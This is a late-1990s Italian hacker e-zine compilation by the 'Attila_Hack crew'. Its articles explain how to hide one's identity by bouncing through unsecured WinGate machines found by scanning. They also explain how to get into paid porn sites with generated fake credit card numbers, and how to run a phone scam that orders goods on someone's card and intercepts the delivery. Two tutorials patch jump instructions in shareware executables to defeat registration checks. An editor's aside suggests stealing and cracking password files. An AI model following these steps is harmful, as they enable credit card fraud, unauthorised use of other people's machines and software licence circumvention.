possono contenere parole di carattere tecnico , comune , ecc. oltre a contenere i dati 
dell'utente scelto ( nome , login ecc. ) le quali vengono criptate di continuo e confrontate
con la passwd da trovare , finche non combacia ; ma questo è un'altra storia .
Adesso che avete la passwd , potete fare quello che ne volete ma state attenti !!!
Byz  
ZioMarzo (section e.zine's ) 
(¯`·.¸¸.·´¯`·.¸¸.-> Attila_Hack crew <-.¸¸.·´¯`·.¸¸.·´¯)
 ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____
||A |||T |||T |||I |||L |||A |||_ |||H |||A |||C |||K ||
||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__||
|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|
Url: http://www.attilahack.cjb.net
mailing list: attila_hack@egroups.com
e-mail: attila_hack@hotmail.com
newsgroup: alt.hackers.attila_hack 
(solo dal news server: news.tiscalinet.it)
irc: #hack-it, #muretto, #crack-it, #wannabe,
#attila_hk, #it@lia, #phreak-it 
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-



      COME ESSERE ANONIMI NEL WEB, SU IRC E QUANDO DECIDIAMO DI MANDARE UNA MAIL

ATTENZIONE: Non utilizzare le informazioni contenute in questo file
per cose illegali: il contenuto e' da ritenersi solo a scopo didattico,
o comunque per uso accettato dalla legge. L'autore non si ritiene
responsabile del cattivo uso delle informazioni qui contenute.
                      *******************************
                          ANONIMI NEL WEB/IRC/MAIL
                        alternativa ai server proxy
                      *******************************
                                di /\\ \/ //\\  /
                                  /  \\/\//  \\/
                                   threenails /
Premessa: se vi e' mai capitato di dovervi collegare sul Net e avete avuto
la necessita' di restare anonimi (per qualsiasi motivo) e non sapevate come
fare, beh questa e' una guida che possibilmente vi risultera' utile.
Esistono i server proxy ed esiste anche un'alternativa.
Informazioni sui server proxy le trovate sul nostro sito e in migliaia di
altri posti.
Qui parliamo dell'alternativa.
"Introduzione"
L'alternativa e' saltellare di qua' e di la' utilizzando una falla
nel programma WinGate. Ma che e'?
WinGate e' un programma per Win utilizzato nelle LAN per far accedere diversi
computer alla rete per mezzo di un solo modem e di un computer che, come si
dice, fa da gateway, da ponte, diciamo.
E noi che c'entriamo (e soprattutto come ci entriamo)?
Semplice, tale programmino apre una porta 23 (quella standard TELNET) sui
computer in cui e'installato: tramite tale porta e il telnet noi avremo un
account, e tramite questo potremo collegarci da altre parti, spedire email,
usare IRC sempre con l'IP del computer che ci ospita (ah, cosa importante,
spesso questo programma non logga nemmeno chi si collega a lui, quindi
potete stare piu' tranquilli dei proxy, ma comunque e' bene tenere gli occhi
aperti...).
Ovviamente per una maggiore sicurezza(dipende che state facendo...si puo'
saltellare da un gate ad un altro sempre con lo stesso metodo che vi diro'
tra un po': anche se tutti vi loggano, non risaliranno mai a voi, costerebbe
troppo ('troppo' non esiste se siete entrati nel FBI e avete scritto
'IDIOTI' su tutti i loro monitor attivi...).
Ma prima...
"Come li trovo 'sti Gateway?"
Ci sono diversi modi: uno e' beccare un programma che fa lo scan di una serie
di indirizzi IP alla ricerca di WinGate (io utilizzo WinGateScan 2.1 - cercate
e troverete - in caso contattatemi pure): il gioco funziona ed e' pure facile.
Un'altra pssibilita' consiste nel cercare tramite IRC.
Molti server IRC rifiutano le connessioni da parte di WinGates e bannano chi
fa richieste di connessioni di questo tipo: tali rifiuti si chiamano 'g-line'.
Trucco: se scrivete su un programma IRC (mIRC dovrebbe andar bene)
/stats g
vi si dovrebbero fornire una serie di IP con una comunicazione del tipo
"xxx.xxx.xxx.xxx insecure WinGate rejected"
beh, avete trovato i vostri WinGate (ovviamente non potrete utilizzarli
con IRC dal momento che sono stati gia' rifiutati).
Anche utenti bannati con questo messaggio
"Automatically banned for excessive connections"
possono essere possibili WinGate.
Controllate che funzionino bene prima di fare troppo affidamento su di essi.
E mo'?
"Addentriamoci..."
'Telnettate' (che schifo di termine!) nell'IP address prescelto, porta 23,
se vi da' il benvenuto una bella scritta 'WinGate>', beh ci siete, siete
dentro al vostro primo WinGate.
Per saltare ad un altro gate seguite lo stesso procedimento via telnet.
Il tutto si puo' fare anche dal vostro programmino IRC: scrivete
/server xxx.xxx.xxx.xxx 23
e siete sul gate.Dopodiche' collegatevi al vostro server IRC preferito con
/raw irc.fucker.undernet.org
e indicate il vostro nick e il vostro username
/raw nick Away
/raw user Away 0 0 :AwayNET
(Molti programmi IRC potrebbero usare /quote al posto di /raw.)
Allo stesso modo potrete usare questo giochino per mandare mail senza
il vostro IP (perche' lo sapete che e' sempre inserito nell'header delle
vostre comunicazioni, no?).
Basta collegarsi dal WinGate al server di posta nella porta 25 (SMTP) con
mail.fucker.com 25
Per spedire mail, i comandi sono quelli standard dell'SMTP - li sto studiando
quindi o ve li cercate in giro (e se li trovate magari me ne spedite una
copia, grazie) oppure aspettate il mio prossimo articolo sull'argomento.
Orientativamente si dovrebbe scrivere qualcosa di simile:
HELO 'nome del host'
MAIL FROM: 'indirizzo'  (non so se questo accetta indirizzi falsi, cosi'
                        abbiamo risolto il problema della email anonime...)
RCPT TO: 'indirizzo destinatario'
SUBJECT: '...'    <-indovinate?
poi tutto quello che volete scrivere...e alla fine
.    <- si proprio un punto e poi
QUIT
Provate, fatemi sapere, e se trovate docs su come spedire file in attachment
o informazioni esatte (se queste fossero sbagliate), beh, fatemele avere!
Beh...e' tutto...se questo file vi ha offeso in qualche modo...sorry...o
meglio....fuck you! - l'ho detto, e' solo a scopo educativo....:)
(Questo articolo e' una traduzione approssimativa ed arricchita(spero) di
'Anonymous Hacking' di un certo AlphaVersion - non voglio fare di certo
il lamer e dire che l'ho fatto tutto io!)
                                                AWAY THREENAILS
                                               www.nails.cjb.net
                                               away@softhome.net
                                           !from the Attila Hack crew!




+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-


			COME HACKERARE I SITI PORNO E ANCHE GUIDA AI SERVER PROXY

Come hackerare un sito porno : by LiQUID 

'ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ"+- +- +- +- +- +- +- +- +- 
'º Come Hackerare i siti porno º-=-=-=-=-=-=-=-=-=-=-=-=-=-
'ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÎÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ"
                              °º Powered by [LiQUID]      º
Indice:                       ²ÌÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ1/4
00 Indice ;)                  °º\            /       /$#@ ]
01 Disclaimer                 ²º \++++++++++/-------/ $#@ ]
02 Teoria                     °º  \        /       /  $#@ ]
03 Cosa vi serve              ²º   \      /\      /   $#@ ]
04 Toria - 2 parte, i proxy   °º    \    /  \    /    $#@ ]
05 Come procedere             ²º     \  /    \  /     $#@ ]
    ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿    °º     \  /    \  /     $#@ ]
    ³ liquido@freemail.it ÃÄÄÄÄÄ1/4+-+-+-\/+-+-+-\/+-+-+-+#@ ]
    ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
Disclaimer
Prima di iniziare vorrei dire che l'autore (io) non puo' essere coinvolto 
o ritenuto colpevole se succedesse qualcosa di ....strano ;) Inoltre non 
promette nulla riguardo il corretto funzionamento di questa semplice tecnica. 
Se pensate di essere coinvolti in qualsiasi maniera in brutte faccende 
leggendo il testo qui di seguito, fermatevi immediatamente e cancellate 
questo sporco pugno di bit dal vostro piccc! ;-P
Se per caso voi veniste coinvolti lo spirito di affrontare questa spiacevole
situazione e': 'Io non c'ero, non sono mai esistito, non ne ho la piu' pallida
idea di come quello sporco pugno di bit sia finito nel mio picci'!'
Oki, ora che ci siamo chiariti le idee possiamo anche incominciare!
Teoria
La tecnica che spieghero' qui di seguito e' molto semplice. Consiste 
nell'entrare in un sito porno, e, trovandoci sbarrata la strada, ci 
sentiremo esclusi da dolci immagini :) e non possima entrare se non pagando 
quello che potrebbe essere buon prezzo se non fosse gestito  da  avidi 
profittatori. Con la nostra consapevolezza cerchiamo di varcare queste 
barriere, poi.......hmm slurp, che belle imaginette ;)
Cosa vi serve
- un picci' monito di monitor, tastiera, mouse, modem, ed account 
  (anche falso :)) per entrare nella grande rete - si puo' trovare in un 
  qualsiasi negozio informatico;
- un GenerId, ovvero un generatore di carte di credito false :) - se ne 
  trova una copia in quasi tutti i siti warez presenti sulla rete (se posso 
  dare un consiglio, a me piace molto quello del mitico Cavallo de Cavallis, 
  al sito http://members.tripod.com/~CavallodeCavallis/index.html);
- una buona lista di proxy server anonimi (per verificare se sono veramente 
  anonimi andate col proxy al sito http://www.anonymizer.com) - 
  il problema di come trovarli verrà affrontato dopo;
Direi basta.
Teoria - 2 parte, i proxy:
Qui di seguito riportero' una parte dell'Enciclopedia di Lord Shinva, 
riguardante i proxy, appunto:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
ANONIMITA' E PROXY
~~~~~~~~~~~~~~~~~~
Cos'e` un proxy?  Senza entrare troppo nel dettaglio, si tratta di un server
che vi permette di accedere a un servizio (generalmente WWW ma talvolta anche
FTP, Gopher e altri) senza mostrare il vostro IP address.  Infatti, sia che
navighiate sul Web o che effettuiate operazioni via FTP, l'IP rivelato sara`
quello del server proxy anziche` il vostro.
Ma come funziona?  Ecco un esempio.
Immaginate di inserire l'indirizzo di un sito web nel vostro browser...
questo contattera` il server contenente le pagine che vi interessano, e le
scarichera` direttamente da li`.  Ovviamente il sysadmin del sito avra` il
vostro IP address e molte altre informazioni su di voi (da quale pagina
provenivate, che tipo e versione di browser utilizzavate, ecc).
Se attivate il servizio di proxy, invece, le cose vanno diversamente.
Supponiamo che vogliate collegarvi al sito hacker http://kr0mecorp.home.ml.org
Questo indirizzo verra` mandato al proxy, che vi si colleghera`, scarichera`
la pagina principale e ve la mandera`.  L'IP address registrato dal sito
sara` quello del proxy, in quanto e` stato il proxy server a collegarsi al
sito, non voi ;)
Come si configura un browser per utilizzare il proxy?  E` presto detto.
Vi faro` un esempio per Netscape (Navigator o Communicator).  Se utilizzate
Micro$oft Explorer non vi spieghero` come fare... passate a Netscape o
arrangiatevi... la roba della Micro$oft e` SEMPRE spazzatura.
Dal menu` preferences di Netscape selezionate advanced e poi proxies, quindi
manual proxy configuration e poi il bottone view.  Ora potrete inserire nella
prima riga (HTTP) il nome del server proxy e poi la porta.
Noterete che ci sono altre caselle libere: FTP, Gopher, ecc.  Se il proxy
server supporta quei servizi, inserite nome del server e porta nelle
rispettive locazioni e potrete accedere anonimamente anche a quei servizi.
Ora siete pronti per navigare, e cio` avverra` in modo trasparente sia per
voi che per la macchina alla quale vi collegate.
Se volete usare un proxy FTP, probabilmente vorrete utilizzare un client
come CuteFTP oppure WS-FTP, anziche` il browser... le operazioni per
configurare tali client sono molto simili, basta trovare il menu` di
configurazione e inserire nome e porta del proxy da utilizzare.
Niente di piu`.
Bene, ora sappiamo come utilizzare i proxy... ma dove possiamo reperirne
uno funzionante da utilizzare?
Il metodo che vado ad illustrarvi e` quello che uso io e che si e` rivelato
efficace nella maggior parte dei casi.
Buona parte dei server proxy hanno un nome che inizia con "proxy." (ad
esempio proxy.pingnet.ch) oppure con "cache" (o "wwwcache" o "webcache"),
e utilizzano come numero di porta uno dei seguenti: 3128, 8000, 8001, 8080,
80, 81, 800 (e raramente varianti di questi).
Basandoci su queste considerazioni, trovare i proxy e` quindi semplicissimo:
prendete un host qualsiasi, meglio se vi sta antipatico, tipo il Berlusconiano
www.mediaset.it oppure www.leganordsen.it (sito web del re assoluto dei
cretini e degli ignoranti) e trasformate l'host name in un possibile nome
"da proxy", ad esempio proxy.leganordsen.it (ovviamente non provate questo,
e` probabile che un sito di merda come quello della Lega Nord non abbia
neanche un proxy...).  A questo punto dovrete utilizzare uno dei numeri di
porta elencati sopra.
Prima di sperimentare tutte le porte, vi converra` controllare che il proxy
esista.  Potete farlo in due modi: o utilizzate l'utility Ping oppure provate
a navigare dopo aver configurato il proxy... se comparira` la finestra di
errore di netscape, l'host non esiste.  Se invece lo status indica "contacting
host proxy.xxxxx.com..." troppo a lungo, vuol dire che la porta non e` quella
esatta; cambiatela e riprovate.
Avrei molti proxy da elencarvi, ma dato che i rispettivi sysadmin si
accorgerebbero dell'improvviso... incremento di utenza ;) diventerebbero
presto inutili.  Trovarli e` comunque, come avete avuto modo di vedere, un
processo estremamente semplice e potrebbe facilmente essere automatizzato,
creando uno scanner che faccia da solo il lavoro, magari scritto in Perl...
Ricordate, *qualunque* host va bene, italiano o straniero, grande o piccolo,
di importanti societa` o piccoli providers.  Talvolta non troverete il
proxy... beh, ci sono tanti altri siti da provare ;)
Fate una ricerca per una parola qualsiasi su un motore di ricerca, ed eccovi
tutti i server di cui avete bisogno.... centinaia di migliaia.
Oppure utilizzate la ricerca avanzata di Altavista e cercate i server che
iniziano per "proxy." ... le possibilita` sono infinite.
Tenete presente che anche i proxy server registrano il vostro IP address,
quindi non fate stupidaggini.  Se proprio volete un maggiore grado di
sicurezza, concatenate i server in questo modo:
http://primo_proxy:porta/http://secondo_proxy:porta/http://www.sito.com/
Piu` lunga e` la catena, piu` difficile sara` rintracciarvi, specie se uno
dei siti della catena cancella i log di accesso piu` frequentemente degli
altri (e non e` una cosa rara... ;)).
Un'ultima parola va detta sui wingates.  Wingate e` un software che permette
di condividere un collegamento a internet da molti pc.  Peccato solo che non
abbia nessuna password di protezione ;) e cosi` chiunque si colleghi a un
server che ha wingate in funzione possa usare quel server come se fosse un
proxy, e per giunta senza neanche lasciare la benche` minima traccia!
Per trovarli, prelevate uno scanner di wingate da internet nel solito modo:
collegatevi (ad esempio) a www.altavista.digital.com e cercate le parole
"wingate scanner".  Troverete molti siti dai quali scaricare uno scanner.
Usate lo scanner su vari servers fino a trovare qualche wingate funzionante.
Eccovi una lista, che pero` probabilmente sara` presto inutile per le ragioni
spiegate sopra per i proxy:
www.este.net
mrenner.bevc.blacksburg.va.us
netgate.maret.org
pc300057.multiweb.net 
cda-bitclub.netbusiness.it
dyn.ml.org
chamail.ozemail.com.au 
sandbox.pacificnet.net 
michae3.lnk.telstra.net
pmzproxy.pmz.com 
showcad.demon.co.uk
Una volta in possesso di qualche sito potete collegarvi alla porta 23 per
accedervi.  Informazioni dettagliate le trovate su http://demoniz.bikkel.com
E... si, sono in INGLESE.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Per semplificarvi la vita (hihihihihihihi, ora ce lo dici ;)))))) lo schema 
proxy e' questo:
Io senza proxy:
ÚÄÄÄÄ¿                     ÚÄÄÄÄÄÄÄÄÄÄ¿    
³ IO ³-=-=-=-=-=-=-=-=-=-=-³ PoRN4Zz0 ³    
ÀÄÄÄÄÙ                     ÀÄÄÄÄÄÄÄÄÄÄÙ     
Io col Proxy
ÚÄÄÄÄ¿           ÚÄÄÄÄÄÄÄ¿           ÚÄÄÄÄÄÄÄÄÄÄ¿
³ IO ³-=-=-=-=-=-³ Pr0XY ³-=-=-=-=-=-³ PoRN4Zz0 ³
ÀÄÄÄÄÙ           ÀÄÄÄÄÄÄÄÙ           ÀÄÄÄÄÄÄÄÄÄÄÙ 
Come Procedere
Allora ragazzi, arrivati al vostro bel pornazzo, entrate nella sezione 
dedicata al pagamento, inserite il vostro bel numero di fake cc (credit card)
aspettate la passwd, e slurp! Guardate bene bene il vostro sitazzo e 
rifatevi gli occh ;)))))
Ma voi mi chiedere perche' tutta quella noisissima storia sui proxy??
La risposta e' questa:
Se io senza proxy mi collego al sito, e commetto un atto illegale (cc fake), 
il mio ip compare sui log del sito, ma se io uso 1 proxy......l'ip che 
appare e' quello del server proxy :)))))))))))))) Io vi consiglio di usare 
piu' proxy, in modo da essere meno raggiungibile e piu' nascosti ;-P
Ed ora ragazzi.........RIFATEVI GLI OCCHI!!!!!!!
La rete e' piena di siti xxx, girate e girate!!!!!!!!!
by [LiQUID]
liquido@freemail.it
PS= Ricordo che questa tecnica pu• essere applicata in moltissimi altri campi,
per esempio come farsi un account falso, dando la fake cc al servizio on-line
della tin, oppure se avete una voce seria potete anche fare telefonate di
questo genere:
io > Scusi vorrei acquistare un vostro prodotto con carta di credito
centralino > va benissimo, mi dica il numero
io > ok, xxxxxxxxxxxxxxx
centralino > ok
io > ma signorina, io lavoro, ci sono solo alle 3 del pomeriggio
centralino > ok, mi dica l'indirizzo
io > via xxxxxxxxxxxxxx
centralino > ok
alle 3 del pomeriggio vai all'inirizzo del tuo nemico, e appena arriva il postino
ritiri tu il pacco :)))))
ciao raga!!!!!!!!!!
-------------------------NOTA IMPORTANTISSIMA (Quequero docet)----------------------------
Salve a tutti raga sono Quequero, in questo articolo liquid non cita una cosa
IMPORTANTISSIMA, cioè che se provate ad "hackare" un sito porno in quel modo non
otterrete null'altro che una bella visita da dei signori vestiti di blu, infatti
è ormai da tanto tempo che questo metodo non funziona perchè i siti che accettano
forme di pagamento utilizzano i sicuri server SSL, che vi loggano l'ip anche se
usate un proxy, quindi o vi procurate un proxy che funzioni anche per l'https oppure
è meglio che iniziate a cambiare stato perchè senza un proxy di quel genere (che
oltretutto deve essere del tipo "anonimo") il vostro ip viene visto sempre
e comunque, quindi uomo avvisato.....Poi questo metodo è ormai inutile perchè i server
SSL utilizzano una rete neurale per il controllo del numero quindi non vi basta più
generare un numero "valido" come potevate fare prima, ma dovete per forza genereare
un numero VERO ed ESISTENTE, quindi se create 1000 numeri diversi probabilmente non ne
otterrete nessuno buono, l'unico metodo è quello di prelevare il file delle pass
crackarlo e trovarvene una oppure inserire un nuovo account nel file stesso (che comunque
fuzionerà solo per uno o due giorni). State molto attenti perchè con questo tentativi 
di "hacking" rischiate grosso, io vi avviso poi fate come volete. Ad ogni modo una volta 
trovato il vostro proxy https potete provare ad "hackare" qualunque sito, vi consiglio però
di utilizzare come browser Opera 3.60 (www.operasoftware.com) perchè durante il collegamento
ad un server SSL ve ne indica il grado di sicurezza e se questo è basso allora potete anche 
tentare....Fate vobis...E poi Opera è anche il più piccolo (1.2mb) e veloce browser al mondo,
non mi stancherò mai di dirlo, usatelo che ne vale davvero la pena.
									Quequero 
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
 
01010011 01100101 01111010 01101001 01101111 01101110 01100101 BoBo & LaNdo
01000011 01110010 01100001 01100011 01101011 01101001 01101110 01100111 
Hahaha solo un vero craccatore può capire cosa c'è scritto qua:) Mi sono proprio divertito
a scriverlo, grazie molte b0nu$ per i tuoi tute, hai visto che a qualcosa sono serviti????
Hehehe adesso scrivo in codice binario :))
BoBo 



					FIRST CRACK: by Away				
 
Tutorial: Cracking by Example : CRACKING DI PROGRAMMI PER WINDOWS
	 	 by  /\ \ \/ / /\ \  /  
		    /\/\ \/\/ /\/\ \/  , 22 7 99
                      THREE NAILS  /
"This is the first step    
your soul will take
up to the sky..."
	da "Divine Step" - Coroner
-----------------------------------------------
Needs : WinDASM 32 (disassemblatore)
	(va bene anche il SoftICE)
	HexEditor  (editor esadecimale)
	(anche un qualsiasi altro editor hex)
	Kawa 2.51  (il programma da crackare)
	
-----------------------------------------------
Prima di iniziare:
Beh, sono le mie prime esperienze da cracker, quindi scusate possibili
idiozie(e magari qualche correzione da chi ne sa di più potrebbe non fare
schifo ... un'email e il gioco è fatto), o la banalità di certe cose,
ma è un tutorial tanto per iniziare, facile facile, niente
di impegnativo...insomma se vi fa schifo OR vi serve qualcosa di più
'professionale' passate ad altro...
 
Va beh, si comincia:
Kawa è un IDE per Java che avevo installato
tempo fa nel mio computer per un progetto: ma che succede?
A metà progetto circa, il signor Kawa mi dice
"Ehi, il tuo tempo è scaduto! Comprami!" - Vaffanc*lo!
Ci devo lavorare io, che serietà del ca**o(!)!!! :)
Così mi armo di qualche programma utile trovato in giro
nella grande ragnatela (sono shareware, registrati...ma 
nel nostro caso vanno bene anche se non sono registrati)
e di un pò di pazienza.
L'idiozia media dei programmi shareware sta nel fatto di 
chiedervi la password per registrarsi e, in caso di password
errata, di far apparire una finestra che ti avverte dell'errore.
Aha!!!!!! Il 99% dei programmi usa una finestra di messaggio 
standard, sta nella libreria API di Win e si chiama MessageBox().
Deduzione logica: all'interno del codice del programma, da 
qualche parte, quasi sicuramente vicine ci sono le funzioni
di controllo della password e la chiamata alla API MessageBox()
(se non sono proprio vicine, ci sono vicine le chiamate
a due pezzi di codici che fanno le due cose - chi ha fatto il
programma è furbo(!?), ha fatto procedure separate, ma a noi
poco importa, no? - in ogni caso un pò di pratica e un minimo
di conoscenza di assembler non guasta...).
Passo Uno: disassemblare il programma con il WinDASM32, 
otterremo il suo listato in assembly, non preoccupatevi, non
dovete conoscere il linguaggio, vi bastano sapere un paio di
cose di cui parlerò tra un pò.
Cerchiamo la chiamata al MessageBox() che ha come parametro
la stringa che ci appare per avvisarci della password errata
- guardare un pò come funziona il WinDASM32, c'è il file di help, 
è molto semplice e questo non è un tutorial su come si usa il WD32 
- e diamo un'occhiata al codice lì intorno...
Ehi, ma cos'è quello? un confronto tra variabili (CMP o TEST) 
e un salto se sono uguali (JE). Vi suggerisce qualcosa?
Possibile che le due variabili contengano il codice da noi
inserito a caso e quello funzionante? Naaaa, trooppo facile...
Proviamo.
Però ricordatevi che lavoriamo con eseguibili, quindi non si deve
inserire codice assembly, ma direttamente codice macchina.
C'è da conoscere l'opcode (equivalente in linguaggio macchina) 
relativo alle varie istruzioni: la tabella successiva fornisce
ciò di cui abbiamo bisogno:
Istruzione          Opcode
JA rel8             77 cb                  
JAE rel8            73 cb                  
JB rel8             72 cb                  
JBE rel8            76 cb                  
JC rel8             72 cb                  
JCXZ rel8           E3 cb                  
JE rel8             74 cb       - salta se uguali          
JG rel8             7F cb                  
JGE rel8            7D cb                  
JL rel8             7C cb                  
JLE rel8            7E cb                  
JNA rel8            76 cb                  
JNAE rel8           72 cb                  
JNB rel8            73 cb                  
JNBE rel8           77 cb                  
JNC rel8            73 cb                  
JNE rel8            75 cb      - salta se non sono uguali 
JNG rel8            7E cb                  
JNGE rel8           7C cb                  
JNL rel8            7D cb                  
JNLE rel8           7F cb                  
JNO rel8            71 cb                  
JNP rel8            7B cb                  
JNS rel8            79 cb                  
JNZ rel8            75 cb                  
JO rel8             70 cb                  
JP rel8             7A cb                  
JPE rel8            7A cb                  
JPO rel8            7B cb                  
JS rel8             78 cb                  
JZ rel8             74 cb                  
JMP rel8            EB cb       - salta in ogni caso
JMP rel16           E9 cw                  
JMP rm16            FF /4                    
JMP ptr16:16        EA cd                 
JMP m16:16          FF /5                 
Il vostro neurone preferito ha iniziato ad agitarsi? Si?
Ok, annotatevi l'offset del punto del programma che ci interessa
(il punto a partire dall'inizio in cui c'è l'istruzione da 
modicare).
Aprite il Kawa.exe con l'HexEditor,
saltate al punto con GOTO x e che trovate?
74xx vii ricorda JE? Geniale...
Lo cancelliamo, e che inseriamo al suo posto?
Come avete detto, EBxx ? Ma dai, non mi dite...
Dopodichè salviamo e proviamo il programma, registriamoci(o 
almeno facciamo il tentativo...) e che succede?
Il programma esce?
Possibile ->> abbiamo sbagliato controllo (quel CMP fa un'altra 
cosa, capita...): beh che si fa? Ricominciamo con quell'altro CMP
là vicino...stesso procedimento e poi di nuovo prova.
(ricordatevi però prima di rimettere a posto quella modifica inutile 
- potresti rendere il programma inutilizzabile - stessa cosa se
provando il programma, non funziona, avete cambiato qualcosa
che non si doveva toccare...)
Come dite, il programma adesso si prende qualsiasi password e
parte correttamente? beh, è tutto, avete crackato il vostro primo 
programmino (magari non proprio da soli...), now be happy...
Tutto ok?
Questo è tutto, fate pratica con altri programmi, e se funziona
allora forse questo tutorial vi è servito a qualcosa.	
Consiglio inoltre di downloadare il tutorial di Xoanon - lo trovate
in giro - anche nel sito di Attila_Hack
(è molto interessante - bravo Xoanon!)
					 "We are the voice. 
					  Do not shut us out."
				       A W A Y  T H R E E  N A I L S
					 from the Attila_Hack Crew
					     away@softhome.net






+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-



				COME CRACKARE MA QUANTO MI COSTI 3.0: by Ritz
       *******************************                               
       *                             *                            
       *    Ma Quanto Mi Costi 3.0   *                       
       *                             *                                 
       *                 by Ritz     *                             
       *                             *
       *******************************
BEST VIEWED WITH M$-d0$ 3D1T0R
******************************************************************************
DESCLAIMER LEGALE:
Ascoltatemi bene prima di leggere questo articolo: esso Š stato scritto a PURO
scopo DIDATTICO: io, Ritz, non incoraggio chi volesse servirsene per scopi
illegali; inoltre non mi assumo alcuna responsabilit... se vi autodistruggete i
progammi. CAPITTOOOO?!
******************************************************************************
Ciao a tutti! Io mi chiamo Ritz, e in questo tute cercher• di spiegare la
sprotezione di un programma che non offre alcuna possibilit… di
registrazione (o almeno io non l'ho trovata... :-) ). Di conseguenza, l'unica
cosa da fare sar… forzare il codice in alcuni punti. Dopo aver fatto ci•,
sar… inoltre necessario togliere un fastidioso nag-screen iniziale.
Il proggy si trova in varie riviste informatiche o al sito:
www.space.tin.it/internet/apizzegh e funge da contascatti per Internet.
OK... tutti pronti? S? Perfetto... sigaretta, Martini Dry, VIA! SE PARTE!!
Allora, installato il programmillo? Perfetto... avviatelo: cercare ora un
men- tipo About/Register. Azz, non c'Š, provate ora a guardare l'iconetta del
Systray: clic destro, scegliete "Informazioni su MQMC32", vi apparir… un
menu... okkakkio, nemmeno l si pu• mettere il serial... come si fa? Beh,
evidentemente il programma Š uno di quelli che dopo 30 gg. si suicidano e
basta. Quindi? Semplice... chiudete l'icona del Systray, portate avanti la
data di 4-5 mesi, riavviate il prog... e, eccovi apparire il messaggio che
vi dice che non lo potete pi- avviare perchŠ il periodo di valutazione Š
scaduto. Male, molto male. Bisogna lavorarci un po' su, che ne dite?
Allora, innanzi tutto bisogna far s che il prog. possa essere avviato...
proviamo quindi a intercettare la funzione che manda il nag iniziale...
CTRL+D per poppare nel Sice, quindi bpx messageboxa. Usciamo con CTRD+D,
riavviamo tutto, e... kakkio il debugger non poppa prima della messagebox...
perchŠ mai? Se avete notato, quando il messaggio appare il PC fa un "beep",
vero? Bene, allora proviamo a cambiare il BPX con un messagebeep: togliete
l'iconetta del MQMC dal Tray, entrate nel Sice, scrivete bpx messagebeep,
uscite, avviate il MQMC, e, voil..., il vostro debugger preferito fa la sua
comparsa!! Usciti dalla funzione con F11, dovreste attraccare qui:
:0048A202 PUSH 32
S? Perfetto! Adesso cancellate tutti i bpx del Sice con bc *, aprite il
vostro W32dasm, disassemblate il file mqmc32.exe... bzzzzzzzzz....zzzzzz...
bzzzzzzzz. Finito!! Ora andate nel menu Search/Find text, scrivete :0048A202,
aspettate un po'... e dovreste arrivare a questo punto:
* Possible StringData Ref from Code Obj ->"10474"
|
:0048A1D9 mov edx, 0048A63C
:0048A1DE call 00403F04
:0048A1E3 jne 0048A228 <-- Jump importante... servir... un po' pi- avanti.
:0048A1E5 mov eax, dword ptr [0049C244]
:0048A1EA cmp dword ptr [eax], 00000000
:0048A1ED je 0048A1FB 
:0048A1EF mov eax, dword ptr [0049C244]
:0048A1F4 mov eax, dword ptr [eax]
:0048A1F6 call 00430A74
* Jump at Address:
|:0048A1ED(C)
|
:0048A1FB push 00000000
* Reference To: user32.MessageBeep, Ord:0000h
|
:0048A1FD Call 00406C9C
:0048A202 push 00000032
:0048A204 mov cx, word ptr [0048A644]
:0048A20B mov dl, 02
* Possible StringData Ref from Code Obj ->"MQMC323.0"
|
:0048A20D mov eax, 0048A650
:0048A212 call 00444C24
:0048A217 mov eax, dword ptr [0049C28C]
:0048A21C mov eax, dword ptr [eax]
:0048A21E call 00432A34
:0048A223 jmp 0048A5A7
* Jump at Address:
|:0048A1E3(C)
|
:0048A228 8D4DB0 lea ecx, dword ptr [ebp-50]
Allora... analizziamo il codice... in 48A1FD c'Š la call del nag-screen...
osservando ora 48E1ED si vede un JE... Jump if Equal... cambiandolo in JMP
si salterebbe la CALL a 41A8F6... implicata probabilmente nel suicidio del
programma dopo il suo avvio. Dunque, segnatevi l'OFFSET di 48E1ED: dovrebbe
essere 895ED... bene, fatevi una copia di MQMC.exe e lasciatela nella stessa
cartella, aprite Hiew, caricate la copia, premete F4, scegliete Decode, poi
F5, scrivete l'OFFSET, premete INVIO, quindi F3 per cambiare il byte 75 in
EB (jump incondizionale), F9 per aggiornare lo schermo, F10 per uscire. Ora
dalla cartella del MQMC caricate la copia (quella taroccata), e vi apparir...
ancora il nag (questo era previsto), ma, se cliccate OK, il prog PARTE!! Lo
avete crackaaatooo. Se ci siete riusciti, complimenti, altrimenti rileggetevi
tutto daccapo...
Ora per• c'Š un piccolo problema teknico: il nag-screen che rompe le palle:
uhm... vediamo che se po' fa'.
